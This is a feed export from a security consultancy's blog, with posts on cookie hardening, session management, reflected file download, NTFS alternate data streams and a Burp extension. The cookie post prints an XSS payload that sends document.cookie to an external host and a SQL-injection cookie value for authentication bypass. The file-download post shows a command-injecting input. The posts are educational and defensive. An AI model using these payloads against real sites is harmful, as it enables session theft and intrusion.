Portcullis Labs » web https://labs.portcullis.co.uk Research and Development en-US hourly 1 http://wordpress.org/?v=3.8.5 Keep your cookies safe (part 2) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/#comments Thu, 15 Feb 2018 20:31:26 +0000 https://labs.portcullis.co.uk/?p=3960 In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why. How to read this post? The flowchart below will guide you to the process to check if […]

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why.

How to read this post?

The flowchart below will guide you to the process to check if your cookies are well protected. Note that there are more factors and cases that could potentially compromise your cookies (as we talked in the part 1 of the blog post).

Of course at the end of the post you will find the explanation to the flowchart. So if you do not understand anything, do not panic! Look for the question in the last part of the blog where it will be explained.

flowchart about securing cookies
image-3961

A flowchart about how to get your cookies better secured.

Is your session cookie different before and after login?

  • Correct answer: Yes, if your unique session ID cookie is different after and before login, your session is correctly protected against Session Fixation attacks
  • Incorrect answer: No, your unique session ID cookie is the same, if an attacker managed to stole your cookie before login into the web application, then once you are authenticated the attacker could also access the application

Recommendation: Session ID should be changed after and before user logs in.

Are you invalidating the session when the user logs out?

  • Correct answer: Yes, once the user has logged out, the session must be destroyed or invalidated
  • Incorrect answer: No, if you do not destroy the session ID in server side, the session will continue being valid

Recommendation: Session must be invalidated after the user logs out.

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes, your cookie is only accessible via http and not via JavaScript
  • Incorrect answer: No, your cookie is also accessible via JavaScript , which in case of an attacker compromise your application with a Cross-site Scripting, it could access to your cookie

Recommendation: Set the cookie as “HttpOnly”.

Does your cookie have the full domain attribute set?

  • Correct answer: Yes, your cookie is only being sent to the correct domain where it is needed
  • Incorrect answer: No, your cookie can be sent to the multiple sub-domains you could have

Recommendation: The full domain of the cookie must be specified.

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No, Cookies with an excessive lifetime will not be deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without a lifetime so that they are deleted once the user closes their browser or lower its lifetime to meet business requirements.

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is not a correct answer to this question.

If you only have one application running over the same domain, you should not need to care about this issue. However if you host multiple web applications, you need to set the attribute “path” of the cookie to ensure that the cookie is only being sent to the web application it belongs.

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes, my cookies do not contains sensitive information
  • Incorrect answer: No, there are some sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there is some other question you need to answer before know if you are protecting correctly your cookies:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all the data is being sent over HTTPS. Although your cookie is secure in this case, you need to be careful if you enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled or has the cookie the attribute “secure”?

If you have HSTS enabled, you are forcing all the data being sent over HTTPS (cookies included).

If the cookie has the attribute “secure”, you are forcing the cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider to enable HSTS.

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/feed/ 0
Web Application Whitepaper https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/ https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/#comments Wed, 06 Sep 2017 11:12:46 +0000 https://labs.portcullis.co.uk/?p=6078 This document aims to analyse and explore data collected from technical assurance engagements during 2016. The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not […]

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they also took a look at the most common web application issues reported by the Team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62
Details

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/feed/ 0
Keep your cookies safe (part 1) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/#comments Fri, 22 Apr 2016 15:03:32 +0000 https://labs.portcullis.co.uk/?p=3605 What are cookies and why are they important? A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. […]

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
What are cookies and why are they important?

A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. Others cookies are used for tracking long-term records of an individuals browsing history and preferences such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Due to the fact that HTTP is a stateless protocol, the web site needs a way to authenticate the user in each request. Every time the user visits a new page within a web site, the browser sends the users cookie back to the server, allowing the server to serve the correct data to that individual user, which is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data used across multiple HTTP requests throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie below is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321;: This is the cookie itself. At the left of the equals symbol is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time when the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that cookies should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (without a value associated) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed through HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a users session ID, which is used to identify a user. If this type of cookie is stolen by a malicious user, they would be able to gain access to web site as the user for which the cookie belonged to (i.e. the malicoius user would have access to your account within the web site).

In the case of the tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data is stored in cookies, for example a username, and this is also a vector for server side exploitation if its contents are not properly validated, which can potentially lead to serious vulnerabilties such as SQL Injection or remote code execution.

What are the main cookie threats?

cookie monster image

Cookie Monster.

There are different attacking vectors in which obtaining and modifying cookies can occur, leading to session hijacking of an authenticated user session, or even SQL injection attacks against the server. These threats may take place when an attacker takes control of the web browser using Cross-site Scripting, or Spyware, in order to obtain a users SessionID cookie that can then be used by an attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (Reflective Cross-site Scripting in this case).


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_web site.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses an URL shortener, this allows for further obfuscation of the malicous URL, as the admin will be unable to see the content of the link they have been sent.

An attacker able to read files from a given user may also attempt to retrieve the cookies stored in files from a system. Furthermore some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside server side when cookies are modified, if input validation routines are not adequately implemented. The example below shows how to bypass the authentication process:

//In /core/user.php: (cs cart vulnerability)

if (fn_get_cookie(AREA_NAME . '_user_id')) {
 $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
 WHERE user_id='".fn_get_cookies(AREA_NAME . '_user_id')."' AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
 fn_define('LOGGED_VIA_COOKIE', true);

}

//Cookie: cs_cookies[customer_user_id]=1'/*;

For their role, cookies are really important and may be used in different attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/feed/ 0
Burp Extension https://labs.portcullis.co.uk/blog/burp-extension/ https://labs.portcullis.co.uk/blog/burp-extension/#comments Wed, 26 Aug 2015 12:09:36 +0000 https://labs.portcullis.co.uk/?p=5225 At Portcullis, one of the more frequent assessments we perform are web application assessments. One of the main challenges we face during these assessments is to look for information that can either help escalate our privileges or allow us to gain access to different functionalities of the web application. Unauthorised access to functionality can often […]

The post Burp Extension appeared first on Portcullis Labs.

]]>
At Portcullis, one of the more frequent assessments we perform are web application assessments. One of the main challenges we face during these assessments is to look for information that can either help escalate our privileges or allow us to gain access to different functionalities of the web application. Unauthorised access to functionality can often be considered an issue however, testing for this can also lead to information about the type of web server an application is running on, the underlying host and its version.

To check whether an application is out-of-date or is there are any known vulnerabilities associated with said version we must first obtain the server and version information. This can often prove time consuming and can be subject to human error. To improve effectiveness and reduce occurrence of human error we developed a BurpSuite extension that checks whether the server discloses any information within the response headers and automatically adds the issue to an issues list.

In addition to checking for disclosed information, the extension with also make a request to the web server’s main page for the latest version and compare this to the application in question to confirm that the application in question is the most up to date available. The most common web servers, and some others, are already bundled with the extension. However, the extension also provides a configuration tab in which the headers that are checked for information disclosure can be modified, removed or added. This also applies to the software, URLs and REGEX used to access the latest versions.

BURPEXTENSION
image-5226

In the above image, you will see that there are two other pieces of functionality bundled with the extension. The first, following the same line of enquiry as the previous (checking the server’s response headers), the extension is also able to check for missing security headers. As before, whilst most of the security headers are already bundled with the extension, it is possible to add more/alternative headers to be check for. Additionally, there is an option to add an informational issue if any of the security headers are found.

The second functionality is a default burp state restorer. Following good practice, a new assessment would start with a clean burp state. To improve efficiency, instead of repeatedly loading the same path state, you can use the extension to load a state file from any chosen path. This will save you at least 4 clicks and you won’t forget to configure anything when starting burp.

Finally, the last piece of functionality provided by the extension is a new tab on the request and response editor window that parses a JSON object and prints it with indentation, making it easier to read. This will prove useful when dealing with web services or AJAX requests with JSON responses.

It should be noted that when reporting the information disclosure and the missing headers issues, only one issue is reported per host. In cases where different finding appear in later responses, further issues will be added with the new findings.

The source code of the application can be found at : https://github.com/eonlight/BurpExtenderHeaderChecks

This blog post was written by Ruben

The post Burp Extension appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/burp-extension/feed/ 0
You can’t even trust your own reflection these days… https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/ https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/#comments Wed, 05 Nov 2014 17:37:34 +0000 https://labs.portcullis.co.uk/?p=4794 Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research […]

The post You can’t even trust your own reflection these days… appeared first on Portcullis Labs.

]]>
Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research discussed another way in which it could be exploited.

The basic premise of the attack (as described on SpiderLabs’s Reflected File Download whitepaper) is as follows:

  1. The user follows a malicious link to a trusted web site
  2. An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was hosted on the trusted web site
  3. The user executes the file which contains shell commands that gain complete control over the computer

So how does it work? On a recent engagement, one of our consultants found a similar issue. In their case, it was a stored variant of the issue SpiderLabs describe but in other regards, it was identical. The consultant discovered that the application they were testing used two APIs that allowed for the storage and retrieval of data, like so:

POST /putData HTTP/1.0
...
{"id":12345, "input":"asdf||calc.exe||pause"}

This data could then be retrieved using the following URL:

  • http://URL/getData/12345;1.bat

Requesting this in a browser results in the browser believing that the user has downloaded what appeared to be a batch file called 12345;1.bat. If the user executes this file, then calc.exe (part of our original input) will be executed.

As with other similar attacks, which exploit variances in how user controlled data is treated by different components of a solution (in this case, the browser and the server), once you know what to watch out for, it’s fairly easy to mitigate.

Specifically:

  • Validate all user input
  • Sanitise by means of context sensitive encoding/escaping any user input that remains
  • Avoid wildcard mappings such as /getdata/* on exposed web services
  • Ensure that you’re correctly setting the important HTTP headers such as Content-Type and Content-Disposition (and other related headers such as X-Content-Type-Options) so that direct requests for the URL cause the file to be downloaded

This last point is particularly important, browsers will often attempt to automatically render downloaded content using whatever application is rendered for the target file type. Sending a Content-Disposition header of:

attachment; filename=1.txt

precludes this, as no matter whether it is saved or opened, it will be treated as text, a relatively safe file type.

All in all, a nice catch and one we’ll definitely use in our red team engagements.

The post You can’t even trust your own reflection these days… appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/feed/ 0
EMF Camp 2014 talk https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/ https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/#comments Thu, 28 Aug 2014 17:15:14 +0000 https://labs.portcullis.co.uk/?p=4646 We recently announced our sponsorship of EMF Camp 2014, were ready to go Portcullis flags in tow and will be heading on over to Milton Keynes to help get EMF ready. While there we will not only be sponsoring the Lounge where people can come and enjoy a space to relax and drink beer and […]

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

]]>
We recently announced our sponsorship of EMF Camp 2014, were ready to go Portcullis flags in tow and will be heading on over to Milton Keynes to help get EMF ready.

While there we will not only be sponsoring the Lounge where people can come and enjoy a space to relax and drink beer and setting up Portcullis Village where people can visit us and exchange ideas but we will be having members of Portcullis hosting talks throughout the weekend.

How Many Bugs Can A Time Server Have? Friday 29th @ 14:00PM Stage B

Portcullis members Tim Brown and Mike Emery will be talking about a number of new advisories to be released by Portcullis during the event including remote root in a network device. The attack surface area will be broken down, with the bugs in each area exposed. The impact of the finding as a whole will then be discussed, with the consequences potentially reaching far beyond the compromised device itself!

Minimal Effort Web Application Security (a.k.a. how to make my job harder) Sunday 31st @ 12:00 Stage C

Portcullis member Graham Sutherland will be presenting his quick tips on making your web applications more resistant to common attack vectors, without putting a lot of effort in. Graham says “In some cases, simply adding a like to a configuration file can completely prevent entire classes of attack from being viable”. Graham will take a look at hardening against XSS, SQL injection, click jacking, password cracking, and a few other bits if there’s time. “With any luck, you’ll make my job a lot harder!”

For those spoilt for choice both talks will be featured in our EMF blog to be posted after the event.

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/feed/ 0
NTFS Alternate Data Streams for pentesters (part 1) https://labs.portcullis.co.uk/blog/ntfs-alternate-data-streams-for-pentesters-part-1/ https://labs.portcullis.co.uk/blog/ntfs-alternate-data-streams-for-pentesters-part-1/#comments Thu, 27 Feb 2014 11:23:17 +0000 https://labs.portcullis.co.uk/?p=3677 Alternate Data Streams (ADS) have been present in modern versions of Windows for a long time. If you are using a NTFS filesystem, you can bet that you are using them. As penetration testers, we can use that OS-specific feature in our advantage. In the following posts information required to understand and identify potential ADS-related issues […]

The post NTFS Alternate Data Streams for pentesters (part 1) appeared first on Portcullis Labs.

]]>
Alternate Data Streams (ADS) have been present in modern versions of Windows for a long time. If you are using a NTFS filesystem, you can bet that you are using them. As penetration testers, we can use that OS-specific feature in our advantage. In the following posts information required to understand and identify potential ADS-related issues will be provided. This post will provide the required background to understand some common scenarios that could be useful during the penetration testing engagements.

What are Alternate Data Streams?

Alternate Data Streams is a feature supported by NTFS (New Technology File System) Windows-proprietary filesystem. With NTFS, all files contain at least one stream, but it is possible to associate alternate streams or contents to that file. When you open a file, you are accessing the main stream of the file, but using a specific syntax, you can access an alternate stream. ADS are also known as NTFS streams.

If it helps you to understand this concept, try to think of the NTFS file as a container with multiple compartments. The container will be the file name, and each of the compartments will be a stream. Unless stated otherwise, when accessing the container, you’ll open the default compartment which is the standard behavior when you open a file on Windows.

Why should I care about ADS?

As penetration testers, using ADS could allow us to bypass the expected behavior of the applications. Take in account that NTFS streams are fully integrated by Windows, which also imply that most of the web components build on top of it supports it (e.g. PHP/Java), even if the developers are not aware of that.

Therefore, using the ADS format could help us during our penetration testing activities, as the input validation controls might not be expecting a filename using the NTFS stream format.

Moreover, over the years multiple vulnerabilities have been identified on different products. For example, IIS has had a couple of vulnerabilities relating to ADS (see CVE-1999-0278 and CVE-2010-2731), but what makes things interesting is that the previous vulnerabilities were reported over 10 years apart!. So in short, this feature has been abused by attackers and security researchers over a period of 10 years(!).

Which are the internal details of ADS?

It seems that NTFS streams were added by Microsoft in order to support the Macintosh Hierarchical File System and the ReFS and Universal Disk Format (UDF) file systems also supports this feature.

You should note that NTFS streams will be lost if you copy files to a file system that doesn’t support them (e.g. FAT). If you need more details, feel free to read the Microsoft documentation here.

As you will see below, NTFS streams are also present on directories, which are a special case. However, as far as I know, its main limitation is that custom streams cannot be created within directories, so we will be limited to reading or deleting directories using the default system stream name.

Basically, the syntax required to access a NTFS stream is the following:

<name>:<stream_name>:<stream_type>
  • name refers the the resource, it can be a file (e.g. document.txt) or a folder (e.g. Windows)
  • stream_name is the name of our compartment, when working with files, an empty stream name indicates the default stream, when dealing with folders, the default stream name will be “$I30″
  • stream_type will be always $DATA when dealing with files or $INDEX_ALLOCATION for folders

When the stream_name is omitted, you are accessing the main stream. For example, the following NTFS streams are equivalent:

  • myfile.txt
  • myfile.txt:
  • myfile.txt::$DATA

In the case of directories, the following NTFS streams are equivalent:

  • mydir
  • mydir:$I30:$INDEX_ALLOCATION
  • mydir::$INDEX_ALLOCATION

How to create ADS

echo "test" > myfile:stream
mkdir "myfolder:$I30:$INDEX_ALLOCATION"

How to read ADS

more < myfile:stream
more < myfile:stream:$DATA
dir C:\Windows:$I30:$INDEX_ALLOCATION

How can I enumerate NTFS data streams on Windows?

Powershell

get-item -Path d:\* -Stream *

Vista and above

dir /r

Sysinternals

streams -s c:

Which ADS should I focus while doing penetration test?

In short, focus should be put in the following elements:

Files

The following NTFS streams might help us to bypass the input validation routines when writing/reading files:

  • myfile.txt::$DATA (Contains the data stored on myfile.txt)
  • myfile.txt:stream:$DATA (Contains the data stored on the ADS called “stream”, which is located on myfile.txt)

Directory

The following attack vectors might allow us to enumerate folders in the remote server or, depending on the implemented input validation routines, perform a more dangerous attacks:

  • directory::$DATA
  • directory:$I30:$INDEX_ALLOCATION
  • directory::$INDEX_ALLOCATION

Summary

This post explained what NTFS streams are, providing the necessary background to understand attacks using this NTFS feature. In the next post we’ll see some examples of potential vulnerabilities that we might expect to see in real-life applications.

The post NTFS Alternate Data Streams for pentesters (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/ntfs-alternate-data-streams-for-pentesters-part-1/feed/ 0
Improving the security in web sessions (part 2) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/#comments Fri, 24 Jan 2014 00:02:38 +0000 https://labs.portcullis.co.uk/?p=2591 The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is not in active use any more but where the user has manually logged out. For example, a user who was using a […]

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is not in active use any more but where the user has manually logged out. For example, a user who was using a banking application and closed the tab without logging out the application.

This point is also crucial for web applications because, computers and web browsers are frequently shared between people so it is important that this case cannot be exploited. Identifying when the user stops working with a web application and terminating the session reduces the window of opportunity that surrounds this type of attacks.

Although web applications should always include a “Log out” button, it is even naive to think that all the users are going to close their sessions when they finish to use a web application or before closing the tab/web browser where it was loaded.

Using JavaScript events

JavaScript allows to control an event which is fired at the moment of a browser window or a browser tab is closed. The name of this event is onbeforeunload. In fact, this event is fired before a page is unloaded, that includes: closing the tab, reloading the page, using the browser’s navigation buttons, click on a link…

The implementation of how the web browser acts when this event is launched depends on the web browser. In general, this event can be used to display a message box asking the user if he wants to close the current page. This message box contains two buttons to allow the user to choose between completing the action, closing the tab, or staying in the page.

So, in principle, it could be possible to detect when the user is closing the page and then send a request to the server with his confirmation. But the fact is that the majority of the web browsers do not return the control to the JavaScript interpreter before closing the tab; so it is not possible to send the request only in those cases that the user decides that he actually wants to close the tab (the event can always send a request before asking the user, but in few browsers will be able to do it after confirmation).

It was possible to check that Firefox returns the control to the JavaScript interpreter, but depending on the version, this only works when the page is reloaded, but not when a tab or the browser is closed (tested with versions 23 and 24). In the same way, Opera version 17 will send the logout request when the browser is closed, but not if the user closes is the tab. The rest of the tested browsers (Safari , IE and Chrome) did not send anything if the user confirmed the tab/browser closing.

The following code is an example about how to implement it:

<html>
<script src="http://code.jquery.com/jquery-1.10.2.min.js">

// Not using JQuery
/*
window.onbeforeunload = function () {
    return  "Are you sure want to LOGOUT the session ?";
};

// Used to logout the session , when browser window was closed
window.onunload = function () {
    $.get( "http://127.0.0.1/logout" );
};
*/

// Using JQuery
$(window).on('beforeunload', function() {
        return 'Are you sure want to LOGOUT the session ?';
});

$(window).unload(function() {
        $.get( "http://127.0.0.1/logout" );
});
</script>

<body>
  <h1><i>Unload</i> and <i>Beforeunload</i> example</h1>
  Please, reload, close this tab or close the browser to launch the test.
</body>
</html>

So, as you would be able to note, this is not a suitable solution to the original problem outlined at the start of this post.

Using AJAX ping

A better approach, because it should work in any web browser, is to reduce the session timeout configuration in the server to few minutes (2-5 minutes) and to ping the server regularly (15-30 seconds) with an AJAX request. The ping request will maintain the sessions life on the web server, preventing it from being timed out unintentionally. On the other hand, if the user closes the tab or the browser, the session will be terminated by the web server after the determined period.

The code below is a possible implementation of an AJAX ping using jQuery:

$(function() { window.setInterval("$.post('http://example.com/keepAlive');", 15000); });

This line should be included in every web page of the application, so it would be a good idea to create a file with it and include the file in the contents of every page served by the web serve.

With this solution, there are two problems:

  • The server will need to be able to support the load of the ping requests which, depending on the number of users, could be thousands each minute. But an application which had that number of users should be able to support that load, so this is not a real problem.
  • If the user leaves the application opened in a browser without supervision, the session will never time out.

The way to fix the second problem is to count the number of pings the server received without any other kind of request and to configure the application to close the session after the corresponding time (idle time). The time limit will need to be longer than the session timeout that has been configured, to avoid those cases of users who are using the application but staying in the same page for a while. For example:

Imagine that the session timeout was configured to 2 minutes and the delay between pings, 15 seconds. That means that after closing the browser, the session will remain live for 2 minutes maximum before being closed. That is a suitable period of time for the web server to wait before timing the session out because it will tolerate some network or connectivity problems which could in principal cause some of the pings to be lost (8 ping requests would have to be lost to close the session by mistake).

The major problem is the idle time, which will have to be configured depending on the kind of application. If the web application contains long articles, the idle time should be set to a longer period (5-10 minutes). If the application consists of small pages, then the idle time could be configured to the same as the session timeout (but never shorter).

By doing this, the application will cover:

  • If the tab or web browser is closed, the session will be terminated after session time out (2 minutes in the example).
  • If the users leaves the application unattended, the session will be closed after the idle time (at least as long as the session time out but no more than 10 minutes).
  • While the user is working with the application, the session will be remain active.

A last improvement would be to use a variable time out. So it could be configured to the same period as the session time out in most cases but could also be increased for those pages which will take longer to read.

Editor’s note: If you enjoyed our two articles on how to improve session management, we’ve asked the author to put together a good practice guide detailing these and other practical steps that can be employed to help keep your users safe.

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/feed/ 0
Improving the security in web sessions (part 1) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/#comments Thu, 09 Jan 2014 14:14:18 +0000 https://labs.portcullis.co.uk/?p=2012 Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks. One way to complicate these types of attack, is for the web application […]

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks.

One way to complicate these types of attack, is for the web application to have the complete control of the user session. Typically web applications use a session token, normally in the form of a cookie, to identify sessions but they do not normally check anything else to verify the legitimacy of the session. So if an attacker can retrieve the token used by an authenticated user in some manner, usually the attacker can steal the victim’s session by sending the retrieved token within each request.

However, if the web application tightly controls the state of the user inside the application, it would be very difficult for an attacker to steal his session if the user is still interacting with it. Let me explain it with an example:

Imagine an application whose flow can be represented with the following diagram:

FlowDiagram
image-2013

In the initial state, users would not be logged into the application and, until they do so, they will stay in that state. After a login to the application, they get access to the private area of the application where there are 3 different pages. From any of those pages, the user can finish their session by going to the logout page. Inside the private area, users only can browse the pages in the order: 1 -> 2 -> 3 -> 1 -> 2 … Any other interaction which is not represented by an arrow in the diagram would not be allowed (for example, going from 2 to 1).

In this context, each session could be represented by the usual session token and the state which the user is in. Doing that, if an attacker was able to retrieve the token in order to attempt to gain access to the application, they would try to access a random state which potentially wouldn’t correspond with any of the following valid states.

For example, if the legitimate user is in the state “Private Page 1″ at the moment of the attack, the only 2 possible next states are “Private Page 2″ and “Log out”. An attacker would need to know this and if they did not, the application could detect the attack and invalidate the session. It is true, that this can be done by exploiting other vulnerabilities, such as a Cross-site Scripting in the application, but if so, the application will store that the new user state is, for example “Private Page 2″. Therefore, when the legitimate user tries to get access to the next state (remember that they were actually in the “Private Page 1″ state), the application will detect the irregularity and will terminate the session.

Hence, although the attacker would be able to retrieve the token and to perform several requests by discovering the state of the user, the application will identify the problem if the user continues using the application and the states of the user and the attacker become desynchronised.

In this scenario, an attacker who successfully locates another suitable vulnerability in the web application (the XSS talked above) might be able to identify the state of the user, allowing them to retrieve the token and the state and to refresh the web browser of the user by changing the session token. By doing so, the attacker would be able to use the session but the user will detect that something weird happened as their session will likely be terminated.

To avoid this situation, the application should protect against the use of concurrent logins. So when the legitimate user logs in again, the application will detect the second session of the same user and will terminate both sessions.

A limitation of this solution is that legitimate users cannot have more than one tab in the same browser on the same application because each tab would be in different states causing the application to identify the scenario as a possible attack and terminate an otherwise legitimate session. Browsers’ navigation buttons (back and forward) would provoke the same eventualities because the user could change between states in the client side “bypassing” the control of the web application.

In order to implement this, the server side application would need to be designed like a state machine where all the relationships between the states are defined. The application will need, therefore, to store the current state of the user inside his session and to check that every request came from the current state and that it is addressed to any of the states which are accessible from the current.

The tokens used to mitigate Cross-site Request Forgery (CSRF) attacks could be used to check the state where the users come from. If the token received by the application with each request matches the token sent to the user previously, this means that the user is coming from a valid state. One of the problem with this approach is that all the requests will need to include the CSRF token (including GET requests) and most libraries do not allow this check for GET requests. Another problem of the usage of the CSRF token is that the solution implemented by many frameworks consists uses one unique token which is sent through all the application but which does not change between requests. In this instance, it would not be possible to differentiate between two different states.

A different approach could be to check the HTTP header “Referer” from each request. In this case, the state could be represented by the URL from where the user is navigating from (remember that this header cannot be trivially manipulated by using JavaScript – only the web browser has access to it). Alternatively, instead of the “Referer” header, an extra hidden field could be added in each form and link which saves the state and preserves it between requests.

Each approach has its benefits and its problems so probably a mixed solution would be better, using the CSRF to preserve the valid states between requests and checking the “Referer” HTTP header to check previous states.

So, summarising:

  • Web session security can be improved by understanding web applications like a state machine and checking the state of each user in each request.
  • Advantages: this approach prevents and/or complicate attacks to the session, such as session hijacking. Furthermore, it might complicate the usage of guessable/default accounts if another user is using it because concurrent sessions must be avoided.
  • Disadvantages: users cannot use the application in different tabs and the interaction with it is limited to the actions offered in each page, rejecting the usage of web browsers navigation buttons.
  • Two possible implementation consist of checking the “Referer” HTTP header and/or the CSRF token sent within each request.

In the next post, I will address another problem relating to web sessions management, how to identify when an user is no longer using the application, and how to close the session as soon as possible.

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/feed/ 0
URL shorteners: What link are you really clicking? https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/ https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/#comments Wed, 08 Jan 2014 06:40:41 +0000 https://labs.portcullis.co.uk/?p=2705 URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been […]

The post URL shorteners: What link are you really clicking? appeared first on Portcullis Labs.

]]>
URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been wary of shortened links and decided I’d take a look at how you can check what it is you’re actually clicking on.

